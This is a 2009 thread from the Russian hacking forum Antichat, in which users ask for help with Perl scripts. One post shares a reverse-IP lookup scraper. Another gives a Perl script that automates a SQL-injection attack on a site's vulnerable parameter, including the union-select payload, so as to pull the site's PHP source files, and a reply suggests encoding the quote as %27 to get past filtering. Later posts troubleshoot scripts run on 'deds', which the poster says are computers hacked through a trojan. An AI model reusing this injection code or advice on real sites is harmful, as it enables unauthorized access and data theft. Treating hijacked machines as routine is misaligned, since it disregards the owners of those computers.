ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1131  
Старый 29.06.2009, 21:22
Аватар для kopele
kopele
Новичок
Регистрация: 19.11.2008
Сообщений: 10
Провел на форуме:
123389

Репутация: 6
По умолчанию

Reverse IP help.
I search for good reverse ip that
ask for insert ip then scan and make output file
whit the ip name and check for host too.

Insert IP:95.95.95.95

95.95.95.95.txt and inside

--------------------------
Report for:95.95.95.95

Hosting:blabla

1.http://www.xxx.com
2.http://www.xxx.com
etc.etc
--------------------------
Some site for reverse

http://www.ip-adress.com/reverse_ip/209.xx.xx.xx
http://www.sitedossier.com/ip/87.xx.xx.xx
http://www.robtex.com/ip/
http://wservices.ru/reverseip.php

and 1 old script

Код:
#!/usr/bin/perl

use LWP::UserAgent;
while (!$ARGV[0]) {
print "Usage: $0 IP \n"; exit;}
$a = 1;
$ua = new LWP::UserAgent(timeout => 15, agent => "Mozilla/5.0 (x11; u; linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7)" );

$req = $ua->get('http://whois.webhosting.info/' . $ARGV[0] . '?pi=1&ob=SLD&oo=ASC');
if (!($req->is_success)) {

die $req->status_line; }
else {
$output = $req->as_string;
until ($output =~ /(.*?)IP\sDetails\s-\sN\/A\./) {
$req = $ua->get('http://whois.webhosting.info/' . $ARGV[0] . '?pi=' . $a . '&ob=SLD&oo=ASC');
if (!($req->is_success)) { die $req->status_line; }
$output = $req->as_string;

while ($output =~ /<td><a\shref=\"http:\/\/whois.webhosting.info\/(.*?)\">/g){
my($crap,$yes)=split(/info\/(.*?)\.\"\>/,$&);
print "$yes\n";
}
sleep 5;
$a++;
}
print "Done!\n";
}
Thanks in advance.

Последний раз редактировалось kopele; 15.07.2009 в 14:15..
 
Ответить с цитированием

  #1132  
Старый 01.07.2009, 11:57
Аватар для incbot
incbot
Новичок
Регистрация: 30.06.2009
Сообщений: 1
Провел на форуме:
2021

Репутация: 0
По умолчанию

Здраствуйте Не осилил всю ветку может где и поднималось. В общем есть задачка написать сплойт по вытаскиванию в познавательных целях php исходников с одного сайта через внедрение запроса к МySQL (используя обнаруженную SQL - injection и благоприятные права на чтение файлов у пользователя БД) Ручками я их уже повытягивал, используя InetCrack, но ввиду большого количества файлов столкнулся с большим количеством рутинных операций. Попробывал написать perl скрипт но столкнулся со сложностями. Дело в том, что для успешной SQL-injection используется обратная кавычка (см переменную sql_inj_str после param) Переменная успешно создается с обратным апострофом в теле, но вот серверу она в качестве контента передается не правильно(судя по ответу как обычная кавычка, которая фильтруется или я чего-то не догоняю) Я не большой специалист в PERLе так что помогите кто чем может Посмотрите пожалуйста код, может будут какие-то мнения?

#!/usr/bin/perl
# подключение библиотек
use strict;
use LWP;
use HTTP::Cookies;

# Путь к сайту и "ядовитый" запрос
my $url='test_site.ru';
my $sql_inj_str='param`+where+name=char(100,100,100)+ union+select+0,0,0,0,0,0,0,0,0,123456789,0+;+--+';

# подготавливаем виртуальный браузер и создаем файл для cookie
my $browser = LWP::UserAgent->new;
$browser->cookie_jar( HTTP::Cookies->new('file' => 'cookies','autosave' => 1));

# отправка запроса
my $script='/index.php?lang=ru&path=log'; #путь до уязвимого скрипта сервера
my $response = $browser->post($url.$script,
Content_Type => 'application/x-www-form-urlencoded',
Content =>
[
nick=>'Test_nick',
server=>$sql_inj_str,
,
]
);
die "$url error: ", $response->status_line unless $response->is_success;

# сохраняем страницу ответа в LOG
open(LOG,'>out_htm.htm');
print(LOG $sql_inj_str);
print(LOG $response->content);
close(LOG);
 
Ответить с цитированием

  #1133  
Старый 26.07.2009, 15:49
Аватар для j0ker13
j0ker13
Участник форума
Регистрация: 28.07.2008
Сообщений: 199
Провел на форуме:
861008

Репутация: 58
По умолчанию

попробуй вместо кавычки %27
 
Ответить с цитированием

  #1134  
Старый 06.08.2009, 19:31
Аватар для mr-leon
mr-leon
Новичок
Регистрация: 24.04.2009
Сообщений: 7
Провел на форуме:
20085

Репутация: 0
По умолчанию

пожалуйста если у вас есть время помогите мне: подскажите как сделать чтоб фаил с расширенеем pl работал мой icq 6680194 будуочень благодарен
 
Ответить с цитированием

  #1135  
Старый 06.08.2009, 19:58
Аватар для Gaus
Gaus
Участник форума
Регистрация: 08.02.2009
Сообщений: 196
Провел на форуме:
1420275

Репутация: 127
По умолчанию

Цитата:
Сообщение от mr-leon  
пожалуйста если у вас есть время помогите мне: подскажите как сделать чтоб фаил с расширенеем pl работал мой icq 6680194 будуочень благодарен
Скачай activeperl, установи и запусти из командной строки
Код:
perl C:\script.pl
Где "C:\script.pl" - путь к скрипту
 
Ответить с цитированием

  #1136  
Старый 09.08.2009, 12:49
Аватар для $ereg@
$ereg@
Познающий
Регистрация: 21.08.2008
Сообщений: 85
Провел на форуме:
298650

Репутация: 15
Отправить сообщение для $ereg@ с помощью ICQ
По умолчанию

помогите пажалуйста...
есть 2 компьтера, на обоих стоит актив перл.
беру один и тотже перл скрипт, запускаю через cmd.
на обоих компьтерах скрипт запускается, но когда начинаю вводить параметры на одном компьтере он параметры принмает и начинает работу, на другом компьтере пишет что параметры неверные...
версия актив перл одна и таже.
такое впечатление что скрипт либо не принимает параметры, либо принимает в какой-то изковерканной форме. например когда раные кодовые таблицы... подскажите чёнибудь пж..
 
Ответить с цитированием

  #1137  
Старый 09.08.2009, 13:34
Аватар для Gaus
Gaus
Участник форума
Регистрация: 08.02.2009
Сообщений: 196
Провел на форуме:
1420275

Репутация: 127
По умолчанию

Цитата:
Сообщение от $ereg@  
помогите пажалуйста...
есть 2 компьтера, на обоих стоит актив перл.
беру один и тотже перл скрипт, запускаю через cmd.
на обоих компьтерах скрипт запускается, но когда начинаю вводить параметры на одном компьтере он параметры принмает и начинает работу, на другом компьтере пишет что параметры неверные...
версия актив перл одна и таже.
такое впечатление что скрипт либо не принимает параметры, либо принимает в какой-то изковерканной форме. например когда раные кодовые таблицы... подскажите чёнибудь пж..
мб кодировки разные? ты случайно не на дедах запускал?
 
Ответить с цитированием

  #1138  
Старый 09.08.2009, 13:37
Аватар для $ereg@
$ereg@
Познающий
Регистрация: 21.08.2008
Сообщений: 85
Провел на форуме:
298650

Репутация: 15
Отправить сообщение для $ereg@ с помощью ICQ
По умолчанию

ну впринципе да... два похеканых компа под ХР через троян от мелгомягких...
 
Ответить с цитированием

  #1139  
Старый 09.08.2009, 14:19
Аватар для Gaus
Gaus
Участник форума
Регистрация: 08.02.2009
Сообщений: 196
Провел на форуме:
1420275

Репутация: 127
По умолчанию

Цитата:
Сообщение от $ereg@  
ну впринципе да... два похеканых компа под ХР через троян от мелгомягких...
Ну а ты что хотел, у тебя на тачке норм запускается?
 
Ответить с цитированием

  #1140  
Старый 09.08.2009, 14:22
Аватар для $ereg@
$ereg@
Познающий
Регистрация: 21.08.2008
Сообщений: 85
Провел на форуме:
298650

Репутация: 15
Отправить сообщение для $ereg@ с помощью ICQ
По умолчанию

да, норм) на некоторых дедах норм... а на некоторых не хотит... чё делать ?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[php] Новичкам: задаем вопросы _Great_ PHP, PERL, MySQL, JavaScript 16396 17.06.2010 21:19
[c/c++] Новичкам: задаем вопросы _Great_ С/С++, C#, Delphi, .NET, Asm 5420 17.06.2010 13:33
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ